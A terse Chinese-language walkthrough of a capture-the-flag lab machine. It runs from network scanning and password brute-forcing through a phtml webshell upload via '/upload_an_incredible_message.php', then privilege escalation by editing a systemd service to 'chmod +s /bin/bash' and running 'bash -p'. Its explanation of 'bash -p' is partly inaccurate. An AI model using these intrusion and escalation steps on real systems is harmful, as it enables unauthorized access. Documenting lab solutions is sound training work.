arp-scan -l

nmap -sS -v 192.168.222.178

80端口

抓包,爆破出密码: santiago

莫斯电码,解密出来内容为NOTHIN7MPORTANT

获得一个关键信息——文件上传路径为
/upload_an_incredible_message.php
上传phtml木马


连接蚁剑

第一个flag


连接ssh,使用system可以连接上

sudo -l

使用nano编辑器编辑immortal.py,CTRL+O保存,CTRL+X退出
sudo -u eric /usr/bin/python3 /opt/immortal.py
-u eric 表示以用户 eric 的身份运行后续的命令。
该命令的具体作用是:
以用户 eric 的身份,使用 /usr/bin/python3 解释器,运行位于 /opt/immortal.py 的 Python 脚本。

sudo -l

sudoedit /etc/systemd/system/immortal.service
ExecStart=/usr/bin/chmod +s /bin/bash

sudo /usr/bin/systemctl stop immortal.service
sudo /usr/bin/systemctl start immortal.service
ls -l /bin/bash

bash -p
1.bash -p 的作用
- 保留权限:-p 选项会阻止 Bash 在启动时重置有效用户 ID(EUID)和有效组 ID(EGID)。这意味着,如果以特权用户(如 root)身份启动 Bash,即使切换到普通用户,Bash 仍会保留特权用户的权限。
- 保留环境变量:-p 选项还会阻止 Bash 在启动时重置环境变量(如 PATH、HOME 等),确保环境变量保持不变。
2. 使用场景
- 特权操作:在某些情况下,需要在普通用户环境中执行特权操作,但又不想完全切换到特权用户。bash -p 可以保留特权用户的权限,方便执行这些操作。
- 环境变量保留:如果需要在启动 Bash 时保留当前的环境变量设置,可以使用 -p 选项。
